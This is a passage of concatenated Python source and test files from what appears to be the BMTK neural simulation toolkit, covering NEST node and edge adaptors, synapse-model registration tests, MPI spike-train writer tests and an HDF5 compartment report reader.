exp_means.iloc[scn, 2:3].values ttp_exp = exp_means.iloc[scn, 0:1].values elif ctype.find('ON') >= 0: si_exp = exp_means.iloc[scn, 3:4].values ttp_exp = exp_means.iloc[scn, 1:2].values else: si_exp = np.NaN * np.ones((1, 5)) ttp_exp = np.NaN * np.ones((1, 2)) nsub = exp_nsub.iloc[scn] if nsub == 1: f0_std = np.mean(exp_std.iloc[max_nsub_ind, 5:10].values) * np.ones((1, 5)) f1_std = np.mean(exp_std.iloc[max_nsub_ind, 10:].values) * np.ones((1, 5)) spont_std = np.mean(exp_std.iloc[max_nsub_ind, 4:5].values) * np.ones((1, 5)) if ctype.find('OFF') >= 0: si_std = np.mean(exp_std.iloc[max_nsub_ind, 2:3].values) * np.ones((1, 5)) elif ctype.find('ON') >= 0: si_std = np.mean(exp_std.iloc[max_nsub_ind, 3:4].values) * np.ones((1, 5)) else: si_std = np.NaN * np.ones((1, 5)) else: f0_std = exp_std.iloc[scn, 5:10].values f1_std = exp_std.iloc[scn, 10:].values spont_std = exp_std.iloc[scn, 4:5].values if ctype.find('OFF') >= 0: si_std = 
exp_std.iloc[scn, 2:3].values elif ctype.find('ON') >= 0: si_std = exp_std.iloc[scn, 3:4].values else: si_std = np.NaN * np.ones((1, 5)) if ctype.find('t') >= 0: tcross = 40. si_inf_exp = (si_exp - tcross / 200.) * (200. / (200. - tcross - 40.)) elif ctype.find('s') >= 0: tcross = 60. si_inf_exp = (si_exp - tcross / 200.) * (200. / (200. - tcross - 40.)) else: si_inf_exp = np.nan dict_key = exp_means.iloc[scn].name[3:] exp_prs_dict[dict_key] = {} exp_prs_dict[dict_key]['f0_exp'] = f0_exp exp_prs_dict[dict_key]['f1_exp'] = f1_exp exp_prs_dict[dict_key]['spont_exp'] = spont_exp exp_prs_dict[dict_key]['si_exp'] = si_exp exp_prs_dict[dict_key]['si_inf_exp'] = si_inf_exp exp_prs_dict[dict_key]['ttp_exp'] = ttp_exp exp_prs_dict[dict_key]['f0_std'] = f0_std exp_prs_dict[dict_key]['f1_std'] = f1_std exp_prs_dict[dict_key]['spont_std'] = spont_std exp_prs_dict[dict_key]['si_std'] = si_std exp_prs_dict[dict_key]['nsub'] = nsub exp_prs_dict[dict_key]['N_class'] = N_class return exp_prs_dict """ ################################################## def check_optim_results_against_bounds(bounds, opt_wts, opt_kpeaks): bds_wts0 = bounds[0] bds_wts1 = bounds[1] bds_kp0 = bounds[2] bds_kp1 = bounds[3] opt_wts0 = opt_wts[0] opt_wts1 = opt_wts[1] opt_kp0 = opt_kpeaks[0] opt_kp1 = opt_kpeaks[1] if (opt_wts0 == bds_wts0[0] or opt_wts0 == bds_wts0[1]): prm_on_bds = 'w0' elif (opt_wts1 == bds_wts1[0] or opt_wts1 == bds_wts1[1]): prm_on_bds = 'w1' elif (opt_kp0 == bds_kp0[0] or opt_kp0 == bds_kp0[1]): prm_on_bds = 'kp0' elif (opt_kp1 == bds_kp1[0] or opt_kp1 == bds_kp1[1]): prm_on_bds = 'kp1' else: prm_on_bds = 'None' return prm_on_bds def cross_from_above(x, threshold): """Return the indices into *x* where *x* crosses some threshold from above.""" x = np.asarray(x) ind = np.nonzero((x[:-1] >= threshold) & (x[1:] < threshold))[0] if len(ind): return ind+1 else: return ind ####################################################### def get_tcross_from_temporal_kernel(temporal_kernel): max_ind = np.argmax(temporal_kernel) min_ind = np.argmin(temporal_kernel) temp_tcross_ind = cross_from_above(temporal_kernel[max_ind:min_ind], 0.0) tcross_ind = max_ind + temp_tcross_ind[0] return tcross_ind ``` #### File: simulator/pointnet/sonata_adaptors.py ```python import numpy as np from collections import Counter import numbers import nest import types import pandas as pd from bmtk.simulator.core.sonata_reader import NodeAdaptor, SonataBaseNode, EdgeAdaptor, SonataBaseEdge from bmtk.simulator.pointnet.io_tools import io from bmtk.simulator.pointnet.pyfunction_cache import py_modules from bmtk.simulator.pointnet.glif_utils import convert_aibs2nest def all_null(node_group, column_name): """Helper function to determine if a column has any non-NULL values""" types_table = node_group.parent.types_table non_null_vals = [types_table[ntid][column_name] for ntid in np.unique(node_group.node_type_ids) if types_table[ntid][column_name] is not None] return len(non_null_vals) == 0 class PointNodeBatched(object): def __init__(self, node_ids, gids, node_types_table, node_type_id): self._n_nodes = len(node_ids) self._node_ids = node_ids self._gids = gids self._nt_table = node_types_table self._nt_id = node_type_id self._nest_ids = [] @property def n_nodes(self): return self._n_nodes @property def node_ids(self): return self._node_ids @property def gids(self): return self._gids @property def nest_ids(self): return self._nest_ids @property def nest_model(self): return self._nt_table[self._nt_id]['model_template'].split(':')[1] @property def 
nest_params(self): return self._nt_table[self._nt_id]['dynamics_params'] @property def model_type(self): return self._nt_table[self._nt_id]['model_type'] def build(self): self._nest_ids = nest.Create(self.nest_model, self.n_nodes, self.nest_params) class PointNode(SonataBaseNode): def __init__(self, node, prop_adaptor): super(PointNode, self).__init__(node, prop_adaptor) self._nest_ids = [] @property def n_nodes(self): return 1 @property def node_ids(self): return [self._prop_adaptor.node_id(self._node)] @property def gids(self): return [self._prop_adaptor.gid(self._node)] @property def nest_ids(self): return self._nest_ids @property def nest_model(self): return self._prop_adaptor.model_template(self._node)[1] @property def nest_params(self): return self.dynamics_params def build(self): nest_model = self.nest_model dynamics_params = self.dynamics_params fnc_name = self._node['model_processing'] if fnc_name is None: self._nest_ids = nest.Create(nest_model, 1, dynamics_params) else: cell_fnc = py_modules.cell_processor(fnc_name) self._nest_ids = cell_fnc(nest_model, self._node, dynamics_params) class PointNodeAdaptor(NodeAdaptor): def __init__(self, network): super(PointNodeAdaptor, self).__init__(network) # Flag for determining if we can build multiple NEST nodes at once. If each individual node has unique # NEST params or a model_processing function is being called then we must nest.Create for each individual cell. # Otherwise we can try to call nest.Create for a batch of nodes that share the same properties self._can_batch = True @property def batch_process(self): return self._can_batch @batch_process.setter def batch_process(self, flag): self._can_batch = flag def get_node(self, sonata_node): return PointNode(sonata_node, self) def get_batches(self, node_group): node_ids = node_group.node_ids node_type_ids = node_group.node_type_ids node_gids = node_group.gids if node_gids is None: node_gids = node_ids ntids_counter = Counter(node_type_ids) nid_groups = {nt_id: np.zeros(ntids_counter[nt_id], dtype=np.uint32) for nt_id in ntids_counter} gid_groups = {nt_id: np.zeros(ntids_counter[nt_id], dtype=np.uint32) for nt_id in ntids_counter} node_groups_counter = {nt_id: 0 for nt_id in ntids_counter} for node_id, gid, node_type_id in zip(node_ids, node_gids, node_type_ids): grp_indx = node_groups_counter[node_type_id] nid_groups[node_type_id][grp_indx] = node_id gid_groups[node_type_id][grp_indx] = gid node_groups_counter[node_type_id] += 1 return [PointNodeBatched(nid_groups[nt_id], gid_groups[nt_id], node_group.parent.node_types_table, nt_id) for nt_id in ntids_counter] @staticmethod def preprocess_node_types(network, node_population): NodeAdaptor.preprocess_node_types(network, node_population) node_types_table = node_population.types_table if 'model_template' in node_types_table.columns and 'dynamics_params' in node_types_table.columns: node_type_ids = np.unique(node_population.type_ids) for nt_id in node_type_ids: node_type_attrs = node_types_table[nt_id] mtemplate = node_type_attrs['model_template'] dyn_params = node_type_attrs['dynamics_params'] if mtemplate.startswith('nest:glif') and dyn_params.get('type', None) == 'GLIF': model_template, dynamics_params = convert_aibs2nest(mtemplate, dyn_params) node_type_attrs['model_template'] = model_template node_type_attrs['dynamics_params'] = dynamics_params @staticmethod def patch_adaptor(adaptor, node_group, network): node_adaptor = NodeAdaptor.patch_adaptor(adaptor, node_group, network) # If dynamics params is stored in the nodes.h5 then we have 
to build each node separate if node_group.has_dynamics_params: node_adaptor.batch_process = False # If there is a non-null value in the model_processing column then it potentially means that every cell is # uniquly built (currently model_processing is applied to each individ. cell) and nodes can't be batched if 'model_processing' in node_group.columns: node_adaptor.batch_process = False elif 'model_processing' in node_group.all_columns and not all_null(node_group, 'model_processing'): node_adaptor.batch_process = False if node_adaptor.batch_process: io.log_info('Batch processing nodes for {}/{}.'.format(node_group.parent.name, node_group.group_id)) return node_adaptor class PointEdge(SonataBaseEdge): @property def source_node_ids(self): return [self._edge.source_node_id] @property def target_node_ids(self): return [self._edge.target_node_id] @property def nest_params(self): if self.model_template in py_modules.synapse_models: src_node = self._prop_adaptor._network.get_node_id(self.source_population, self.source_node_id) trg_node = self._prop_adaptor._network.get_node_id(self.target_population, self.target_node_id) syn_model_fnc = py_modules.synapse_model(self.model_template) else: src_node = None trg_node = None syn_model_fnc = py_modules.synapse_models('default') return syn_model_fnc(self, src_node, trg_node) class PointEdgeBatched(object): def __init__(self, source_nids, target_nids, nest_params): self._src_nids = source_nids self._trg_nids = target_nids self._nest_params = nest_params @property def source_node_ids(self): return self._src_nids @property def target_node_ids(self): return self._trg_nids @property def nest_params(self): return self._nest_params class PointEdgeAdaptor(EdgeAdaptor): def __init__(self, network): super(PointEdgeAdaptor, self).__init__(network) self._can_batch = True @property def batch_process(self): return self._can_batch @batch_process.setter def batch_process(self, flag): self._can_batch = flag def synaptic_params(self, edge): # TODO: THIS NEEDS to be replaced with call to synapse_models params_dict = {'weight': self.syn_weight(edge, None, None), 'delay': edge.delay} params_dict.update(edge.dynamics_params) return params_dict def get_edge(self, sonata_node): return PointEdge(sonata_node, self) @staticmethod def preprocess_edge_types(network, edge_population): # Fix for sonata/300_pointneurons EdgeAdaptor.preprocess_edge_types(network, edge_population) edge_types_table = edge_population.types_table edge_type_ids = np.unique(edge_population.type_ids) for et_id in edge_type_ids: edge_type = edge_types_table[et_id] if 'model_template' in edge_types_table.columns: model_template = edge_type['model_template'] if model_template.startswith('nest'): edge_type['model_template'] = model_template[5:] def get_batches(self, edge_group): src_ids = {} trg_ids = {} edge_types_table = edge_group.parent.edge_types_table edge_type_ids = edge_group.edge_type_ids et_id_counter = Counter(edge_type_ids) tmp_df = pd.DataFrame({'etid': edge_type_ids, 'src_nids': edge_group.src_node_ids, 'trg_nids': edge_group.trg_node_ids}) if 'nsyns' in edge_group.columns: tmp_df['nsyns'] = edge_group.get_dataset('nsyns') if 'syn_weight' in edge_group.columns: tmp_df['syn_weight'] = edge_group.get_dataset('syn_weight') if 'delay' in edge_group.columns: tmp_df['delay'] = edge_group.get_dataset('delay') #for et_id, grp_vals in tmp_df.groupby('etid'): # src_ids[et_id] = np.array(grp_vals['src_nids']) # trg_ids[et_id] = np.array(grp_vals['trg_nids']) type_params = {edge_id: {} for edge_id in 
et_id_counter.keys()} src_pop = edge_group.parent.source_population trg_pop = edge_group.parent.target_population grp_df = None src_nodes_df = None trg_nodes_df = None for edge_id, grp_vals in tmp_df.groupby('etid'): edge_props = edge_types_table[edge_id] # Get the model type type_params[edge_id]['model'] = edge_props['model_template'] # Add dynamics params # TODO: Add to dataframe and if a part of hdf5 we can return any dynamics params as a list type_params[edge_id].update(edge_props['dynamics_params']) # get the delay parameter if 'delay' in grp_vals.columns: type_params[edge_id]['delay'] = grp_vals['delay'] elif 'delay' in edge_props.keys(): type_params[edge_id]['delay'] = edge_props['delay'] weight_function = edge_types_table[edge_id].get('weight_function', None) if weight_function is not None: if grp_df is None: grp_df = edge_group.to_dataframe() src_nodes_df = self._network.get_nodes_df(src_pop) trg_nodes_df = self._network.get_nodes_df(trg_pop) edges = grp_df[grp_df['edge_type_id'] == edge_id] target_nodes = trg_nodes_df.loc[edges['target_node_id'].values] source_nodes = src_nodes_df.loc[edges['source_node_id'].values] weight_fnc = py_modules.synaptic_weight(weight_function) type_params[edge_id]['weight'] = weight_fnc(edges, source_nodes, target_nodes) else: # Get nsyns as either an array or a constant. If not explcitiy specified assume nsyns = 1 if 'nsyns' in grp_vals.columns: nsyns = grp_vals['nsyns'].values else: nsyns = edge_props.get('nsyns', 1) # get syn_weight as either an array or constant. If not explicity stated throw an error if 'syn_weight' in grp_vals.columns: syn_weight = grp_vals['syn_weight'].values elif 'syn_weight' in edge_props.keys(): syn_weight = edge_props['syn_weight'] else: # TODO: Make more explicity. Or default to syn_weight of 0 raise Exception('Could not find syn_weight value') # caluclate weight type_params[edge_id]['weight'] = nsyns * syn_weight yield PointEdgeBatched(source_nids=grp_vals['src_nids'].values, target_nids=grp_vals['trg_nids'].values, nest_params=type_params[edge_id]) @staticmethod def patch_adaptor(adaptor, edge_group): edge_adaptor = EdgeAdaptor.patch_adaptor(adaptor, edge_group) if 'weight_function' not in edge_group.all_columns and 'syn_weight' in edge_group.all_columns: adaptor.syn_weight = types.MethodType(point_syn_weight, adaptor) #else: # edge_adaptor.batch_process = False return edge_adaptor def point_syn_weight(self, edge, src_node, trg_node): return edge['syn_weight']*edge.nsyns ``` #### File: simulator/bionet/test_nrn.py ```python import pytest from .conftest import * @pytest.mark.skipif(not nrn_installed, reason='NEURON is not installed') def test_weight(): def wmax(v1, v2): return max(v1, v2) def wmin(v1, v2): return min(v1, v2) add_weight_function(wmax) add_weight_function(wmin, 'minimum') assert('wmax' in py_modules.synaptic_weights) assert('minimum' in py_modules.synaptic_weights) assert('wmin' not in py_modules.synaptic_weights) wmax_fnc = py_modules.synaptic_weight('wmax') assert(wmax_fnc(1, 2) == 2) wmin_fnc = py_modules.synaptic_weight('minimum') assert(wmin_fnc(1, 2) == 1) py_modules.clear() @pytest.mark.skipif(not nrn_installed, reason='NEURON is not installed') def test_weight_decorator(): @synaptic_weight def wmax(v1, v2): return max(v1, v2) @synaptic_weight(name='minimum') def wmin(v1, v2): return min(v1, v2) assert('wmax' in py_modules.synaptic_weights) assert('minimum' in py_modules.synaptic_weights) assert('wmin' not in py_modules.synaptic_weights) wmax_fnc = py_modules.synaptic_weight('wmax') 
assert(wmax_fnc(1, 2) == 2) wmin_fnc = py_modules.synaptic_weight('minimum') assert(wmin_fnc(1, 2) == 1) py_modules.clear() @pytest.mark.skipif(not nrn_installed, reason='NEURON is not installed') def test_synapse_model(): def syn1(): return 'Syn1' def syn2(p1, p2): return p1, p2 add_synapse_model(syn1) add_synapse_model(syn2, 'synapse_2') assert('syn1' in py_modules.synapse_models) assert('synapse_2' in py_modules.synapse_models) assert('syn2' not in py_modules.synapse_models) syn_fnc = py_modules.synapse_model('syn1') assert(syn_fnc() == 'Syn1') syn_fnc = py_modules.synapse_model('synapse_2') assert(syn_fnc(1, 2) == (1, 2)) py_modules.clear() @pytest.mark.skipif(not nrn_installed, reason='NEURON is not installed') def test_synapse_model_decorator(): @synapse_model def syn1(): return 'Syn1' @synapse_model(name='synapse_2') def syn2(p1, p2): return p1, p2 assert('syn1' in py_modules.synapse_models) assert('synapse_2' in py_modules.synapse_models) assert('syn2' not in py_modules.synapse_models) syn_fnc = py_modules.synapse_model('syn1') assert(syn_fnc() == 'Syn1') syn_fnc = py_modules.synapse_model('synapse_2') assert(syn_fnc(1, 2) == (1, 2)) py_modules.clear() @pytest.mark.skip() def test_cell_model(): def hoc1(): return "hoc" def hoc2(p1): return p1 add_cell_model(hoc1) add_cell_model(hoc2, name='hoc_function') assert('hoc1' in py_modules.cell_models) assert('hoc_function' in py_modules.cell_models) assert('hoc2' not in py_modules.cell_models) hoc_fnc = py_modules.cell_model('hoc1') assert(hoc_fnc() == 'hoc') hoc_fnc = py_modules.cell_model('hoc_function') assert(hoc_fnc(1.0) == 1.0) @pytest.mark.skip() def test_cell_model_decorator(): @cell_model def hoc1(): return "hoc" @cell_model(name='hoc_function') def hoc2(p1): return p1 assert('hoc1' in py_modules.cell_models) assert('hoc_function' in py_modules.cell_models) assert('hoc2' not in py_modules.cell_models) hoc_fnc = py_modules.cell_model('hoc1') assert(hoc_fnc() == 'hoc') hoc_fnc = py_modules.cell_model('hoc_function') assert(hoc_fnc(1.0) == 1.0) @pytest.mark.skip() def test_load_py_modules(): import set_weights import set_syn_params import set_cell_params load_py_modules(cell_models=set_cell_params, syn_models=set_syn_params, syn_weights=set_weights) assert(all(n in py_modules.cell_models for n in ['Biophys1', 'IntFire1'])) assert(isinstance(py_modules.cell_model('Biophys1'), types.FunctionType)) assert (isinstance(py_modules.cell_model('IntFire1'), types.FunctionType)) assert (all(n in py_modules.synapse_models for n in ['exp2syn'])) assert (isinstance(py_modules.synapse_model('exp2syn'), types.FunctionType)) assert (all(n in py_modules.synaptic_weights for n in ['wmax', 'gaussianLL'])) assert (isinstance(py_modules.synaptic_weight('wmax'), types.FunctionType)) assert (isinstance(py_modules.synaptic_weight('gaussianLL'), types.FunctionType)) ``` #### File: simulator/pointnet/pointnet_virtual_files.py ```python import numpy as np class NodeRow(object): @property def with_dynamics_params(self): return False class NodesFile(object): def __init__(self, N): self._network_name = 'test_bionet' self._version = None self._iter_index = 0 self._nrows = 0 self._node_types_table = None self._N = N self._rot_delta = 360.0/float(N) self._node_types_table = { 101: { 'pop_name': 'Rorb', 'node_type_id': 101, 'model_type': 'iaf_psc_alpha', 'dynamics_params': 'iaf_dynamics.json', 'ei': 'e' }, 102: { 'pop_name': 'PV1', 'node_type_id': 102, 'model_type': 'izhikevich', 'dynamics_params': 'iz_dynamics.json', 'ei': 'i' } } @property def name(self): """name 
of network containing these nodes""" return self._network_name @property def version(self): return self._version @property def gids(self): raise NotImplementedError() @property def node_types_table(self): return self._node_types_table def load(self, nodes_file, node_types_file): raise NotImplementedError() def get_node(self, gid, cache=False): return self[gid] def __len__(self): return self._N def __iter__(self): self._iter_index = 0 return self def next(self): if self._iter_index >= len(self): raise StopIteration node_row = self[self._iter_index] self._iter_index += 1 return node_row def __getitem__(self, gid): node_props = {'positions': np.random.rand(3), 'rotation': self._rot_delta*gid, 'weight': 0.0001*gid} return NodeRow(gid, node_props, self.__get_node_type_props(gid)) def __get_node_type_props(self, gid): if gid <= self._N/2: return self._node_types_table[101] else: return self._node_types_table[102] class EdgeRow(object): @property def with_dynamics_params(self): return False class EdgesFile(object): def __init__(self, target_nodes, source_nodes): self._target_nodes = target_nodes self._source_nodes = source_nodes self._edge_type_props = [ { 'node_type_id': 1, 'target_query': 'model_type="iaf_psc_alpha"', 'source_query': 'ei="e"', 'syn_weight': .10, 'delay': 2.0, 'dynamics_params': 'iaf_exc.json' }, { 'node_type_id': 2, 'target_query': 'model_type="iaf_psc_alpha"', 'source_query': 'ei="i"', 'syn_weight': -.10, 'delay': 2.0, 'dynamics_params': 'iaf_inh.json' }, { 'node_type_id': 3, 'target_query': 'model_type="izhikevich"', 'source_query': 'ei="e"', 'syn_weight': .20, 'delay': 2.0, 'dynamics_params': 'izh_exc.json' }, { 'node_type_id': 4, 'target_query': 'model_type="izhikevich"', 'source_query': 'ei="i"', 'syn_weight': -.20, 'delay': 2.0, 'dynamics_params': 'izh_inh.json' } ] @property def source_network(self): """Name of network containing the source gids""" return self._source_nodes.name @property def target_network(self): """Name of network containing the target gids""" return self._target_nodes.name def load(self, edges_file, edge_types_file): raise NotImplementedError() def edges_itr(self, target_gid): trg_node = self._target_nodes[target_gid] for src_node in self._source_nodes: edge_props = {'syn_weight': trg_node['weight']} #edge_type_props = {'edge_type_id': 1} yield EdgeRow(trg_node.gid, src_node.gid, edge_props, self.__get_edge_type_prop(src_node, trg_node)) #def __init__(self, trg_gid, src_gid, edge_props={}, edge_type_props={}): #raise NotImplementedError() def __len__(self): return len(self._source_nodes)*len(self._target_nodes) def __get_edge_type_prop(self, source_node, target_node): indx = 0 if source_node['model_type'] == 'iaf_psc_alpha' else 2 indx += 0 if target_node['ei'] == 'e' else 1 return self._edge_type_props[indx] ``` #### File: reports/spike_trains/test_sonata_adaptor_mpi.py ```python import pytest import numpy as np import h5py import tempfile from bmtk.utils.reports.spike_trains.spike_train_buffer import STMPIBuffer, STCSVMPIBufferV2 # from bmtk.utils.reports.spike_trains.adaptors.sonata_adaptors import write_sonata, write_sonata_itr from bmtk.utils.reports.spike_trains.spikes_file_writers import write_sonata, write_sonata_itr from bmtk.utils.sonata.utils import check_magic, get_version from bmtk.utils.reports.spike_trains import sort_order try: from mpi4py import MPI comm = MPI.COMM_WORLD bcast = comm.bcast MPI_rank = comm.Get_rank() MPI_size = comm.Get_size() except: MPI_rank = 0 MPI_size = 1 def create_st_buffer_mpi(st_cls): # Helper for creating 
spike_trains object if issubclass(st_cls, STCSVMPIBufferV2): tmp_dir = tempfile.mkdtemp() if MPI_rank == 0 else None tmp_dir = comm.bcast(tmp_dir, 0) return st_cls(cache_dir=tmp_dir) else: return st_cls() def tmpdir(): tmp_dir = tempfile.mkdtemp() if MPI_rank == 0 else None tmp_dir = comm.bcast(tmp_dir, 0) return tmp_dir def tmpfile(): tmp_file = tempfile.NamedTemporaryFile(suffix='.h5').name if MPI_rank == 0 else None tmp_file = comm.bcast(tmp_file, 0) return tmp_file @pytest.mark.parametrize('st_cls', [ STMPIBuffer, STCSVMPIBufferV2 ]) @pytest.mark.parametrize('write_fnc', [ write_sonata, write_sonata_itr ]) def test_write_sonata(st_cls, write_fnc): st = create_st_buffer_mpi(st_cls) st.add_spikes(population='V1', node_ids=MPI_rank, timestamps=[MPI_rank]*5) st.add_spike(population='V2', node_id=MPI_size, timestamp=float(MPI_rank)) st.add_spikes(population='R{}'.format(MPI_rank), node_ids=0, timestamps=[0.1, 0.2, 0.3, 0.4]) tmp_h5 = tmpfile() write_fnc(tmp_h5, st) if MPI_rank == 0: # Warnings: some systems creates lock even for reading an hdf5 file with h5py.File(tmp_h5, 'r') as h5: assert(check_magic(h5)) assert(get_version(h5) is not None) assert(set(h5['/spikes'].keys()) >= {'R{}'.format(r) for r in range(MPI_size)} | {'V1', 'V2'}) assert(set(h5['/spikes/V1']['node_ids'][()]) == {i for i in range(MPI_size)}) assert(set(h5['/spikes/V2']['timestamps'][()]) == {float(i) for i in range(MPI_size)}) for r in range(MPI_size): grp = h5['/spikes/R{}'.format(r)] assert(np.all(grp['node_ids'][()] == [0, 0, 0, 0])) assert(np.allclose(grp['timestamps'][()], [0.1, 0.2, 0.3, 0.4])) @pytest.mark.parametrize('st_cls', [ STMPIBuffer, STCSVMPIBufferV2 ]) @pytest.mark.parametrize('write_fnc', [ write_sonata, write_sonata_itr ]) def test_write_sonata_byid(st_cls, write_fnc): st = create_st_buffer_mpi(st_cls) st.add_spikes(population='V1', node_ids=[MPI_size + MPI_rank, MPI_rank], timestamps=[0.5, 1.0]) tmp_h5 = tmpfile() write_fnc(tmp_h5, st, sort_order=sort_order.by_id) if MPI_rank == 0: with h5py.File(tmp_h5, 'r') as h5: assert(check_magic(h5)) assert(get_version(h5) is not None) assert(np.all(h5['/spikes/V1']['node_ids'][()] == list(range(MPI_size*2)))) assert(len(h5['/spikes/V1']['timestamps'][()]) == MPI_size * 2) @pytest.mark.parametrize('st_cls', [ STMPIBuffer, STCSVMPIBufferV2 ]) @pytest.mark.parametrize('write_fnc', [ write_sonata, write_sonata_itr ]) def test_write_sonata_bytime(st_cls, write_fnc): st = create_st_buffer_mpi(st_cls) st.add_spikes(population='V1', node_ids=[MPI_rank, MPI_rank], timestamps=np.array([MPI_rank/10.0, (MPI_size + MPI_rank)/10.0], dtype=np.float)) tmp_h5 = tmpfile() write_fnc(tmp_h5, st, sort_order=sort_order.by_time) if MPI_rank == 0: with h5py.File(tmp_h5, 'r') as h5: assert(check_magic(h5)) assert(get_version(h5) is not None) assert(len(h5['/spikes/V1']['node_ids'][()]) == MPI_size*2) assert(np.all(np.diff(h5['/spikes/V1']['timestamps'][()]) > 0)) @pytest.mark.parametrize('st_cls', [ STMPIBuffer, STCSVMPIBufferV2 ]) @pytest.mark.parametrize('write_fnc', [ write_sonata, write_sonata_itr ]) def test_write_sonata_empty(st_cls, write_fnc): st = create_st_buffer_mpi(st_cls) tmp_h5 = tmpfile() write_fnc(tmp_h5, st) if MPI_rank == 0: with h5py.File(tmp_h5, 'r') as h5: assert(check_magic(h5)) assert(get_version(h5) is not None) assert('/spikes' in h5) if __name__ == '__main__': # test_write_sonata(STMPIBuffer, write_sonata) # test_write_sonata(STMPIBuffer, write_sonata_itr) # test_write_sonata_byid(STMPIBuffer, write_sonata) # test_write_sonata_bytime(STMPIBuffer, 
write_sonata) test_write_sonata_empty(STMPIBuffer, write_sonata) ``` #### File: bmtk/utils/hdf5_helper.py ```python import sys if sys.version_info[0] == 3: using_py3 = True range_itr = range else: using_py3 = False range_itr = xrange def get_attribute_h5(h5obj, attribut_name, default=None): val = h5obj.attrs.get(attribut_name, default) if using_py3 and isinstance(val, bytes): # There is an but with h5py returning unicode/str based attributes as bytes val = val.decode() return val ``` #### File: reports/compartment/compartment_reader.py ```python import h5py import numpy as np from .core import CompartmentReaderABC from bmtk.utils.hdf5_helper import get_attribute_h5 class _CompartmentPopulationReaderVer01(CompartmentReaderABC): sonata_columns = ['element_ids', 'element_pos', 'index_pointer', 'node_ids', 'time'] def __init__(self, pop_grp, pop_name): self._data_grp = pop_grp['data'] self._mapping = pop_grp['mapping'] self._population = pop_name self._gid2data_table = {} if self._mapping is None: raise Exception('could not find /mapping group') gids_ds = self._mapping[self.node_ids_ds] # ['node_ids'] index_pointer_ds = self._mapping['index_pointer'] for indx, gid in enumerate(gids_ds): self._gid2data_table[gid] = slice(index_pointer_ds[indx], index_pointer_ds[indx+1]) time_ds = self._mapping['time'] self._t_start = np.float(time_ds[0]) self._t_stop = np.float(time_ds[1]) self._dt = np.float(time_ds[2]) self._n_steps = int((self._t_stop - self._t_start) / self._dt) self._custom_cols = {col: grp for col, grp in self._mapping.items() if col not in self.sonata_columns and isinstance(grp, h5py.Dataset)} def _get_index(self, node_id): return self._gid2data_table[node_id] @property def populations(self): return [self._population] @property def data_ds(self): return self._data_grp @property def node_ids_ds(self): return 'node_ids' def get_population(self, population, default=None): raise NotImplementedError() def units(self, population=None): return get_attribute_h5(self.data_ds, 'units', None) #return self.data_ds.attrs.get('units', None) def variable(self, population=None): return get_attribute_h5(self.data_ds, 'variable', None) #return self.data_ds.attrs.get('variable', None) def tstart(self, population=None): return self._t_start def tstop(self, population=None): return self._t_stop def dt(self, population=None): return self._dt def n_steps(self, population=None): return self._n_steps def time(self, population=None): return self._mapping['time'][()] def time_trace(self, population=None): return np.linspace(self.tstart(), self.tstop(), num=self._n_steps, endpoint=True) def node_ids(self, population=None): return self._mapping['node_ids'][()] def index_pointer(self, population=None): return self._mapping['index_pointer'][()] def element_pos(self, node_id=None, population=None): if node_id is None: return self._mapping['element_pos'][()] else: return self._mapping['element_pos'][self._get_index(node_id)]#[indx_beg:indx_end] def element_ids(self, node_id=None, population=None): if node_id is None: return self._mapping['element_ids'][()] else: #indx_beg, indx_end = self._get_index(node_id) #return self._mapping['element_ids'][self._get_index(node_id)]#[indx_beg:indx_end] return self._mapping['element_ids'][self._get_index(node_id)] def n_elements(self, node_id=None, population=None): return len(self.element_pos(node_id)) def data(self, node_id=None, population=None, time_window=None, sections='all', **opts): # filtered_data = self._data_grp multi_compartments = True if node_id is not None: node_range 
= self._get_index(node_id) if sections == 'origin' or self.n_elements(node_id) == 1: # Return the first (and possibly only) compartment for said gid gid_slice = node_range multi_compartments = False elif sections == 'all': # Return all compartments gid_slice = node_range #slice(node_beg, node_end) else: # return all compartments with corresponding element id compartment_list = list(sections) if np.isscalar(sections) else sections gid_slice = [i for i in self._get_index(node_id) if self._mapping['element_ids'] in compartment_list] else: gid_slice = slice(0, self._data_grp.shape[1]) if time_window is None: time_slice = slice(0, self._n_steps) else: if len(time_window) != 2: raise Exception('Invalid time_window, expecting tuple [being, end].') window_beg = max(int((time_window[0] - self.tstart()) / self.dt()), 0) window_end = min(int((time_window[1] - self.tstart()) / self.dt()), self._n_steps / self.dt()) time_slice = slice(window_beg, window_end) filtered_data = np.array(self._data_grp[time_slice, gid_slice]) return filtered_data if multi_compartments else filtered_data[:] def custom_columns(self, population=None): return {k: v[()] for k,v in self._custom_cols.items()} def get_column(self, column_name, population=None): return self._mapping[column_name][()] def get_element_data(self, node_id, population=None): pass def get_report_description(self, population=None): pass def __getitem__(self, population): return self class _CompartmentPopulationReaderVer00(_CompartmentPopulationReaderVer01): sonata_columns = ['element_id', 'element_pos', 'index_pointer', 'gids', 'time'] def node_ids(self, population=None): return self._mapping[self.node_ids_ds][()] @property def node_ids_ds(self): return 'gids' def element_ids(self, node_id=None, population=None): if node_id is None: return self._mapping['element_id'][()] else: #indx_beg, indx_end = self._get_index(node_id) #return self._mapping['element_id'][self._get_index(node_id)]#[indx_beg:indx_end] return self._mapping['element_id'][self._get_index(node_id)] # [indx_beg:indx_end] class CompartmentReaderVer01(CompartmentReaderABC): def __init__(self, filename, mode='r', **params): self._h5_handle = h5py.File(filename, mode) self._h5_root = self._h5_handle[params['h5_root']] if 'h5_root' in params else self._h5_handle['/'] self._popgrps = {} self._mapping = None if 'report' in self._h5_handle.keys(): report_grp = self._h5_root['report'] for pop_name, pop_grp in report_grp.items(): self._popgrps[pop_name] = _CompartmentPopulationReaderVer01(pop_grp=pop_grp, pop_name=pop_name) else: self._default_population = 'pop_na' self._popgrps[self._default_population] = _CompartmentPopulationReaderVer00(pop_grp=self._h5_root, pop_name=self._default_population) if 'default_population' in params: # If user has specified a default population self._default_population = params['default_population'] if self._default_population not in self._popgrps.keys(): raise Exception('Unknown population {} found in report.'.format(self._default_population)) elif len(self._popgrps.keys()) == 1: # If there is only one population in the report default to that self._default_population = list(self._popgrps.keys())[0] else: self._default_population = None @property def default_population(self): if self._default_population is None: raise Exception('Please specify a node population.') return self._default_population @property def populations(self): return list(self._popgrps.keys()) def get_population(self, population, default=None): if population not in self.populations: return default return 
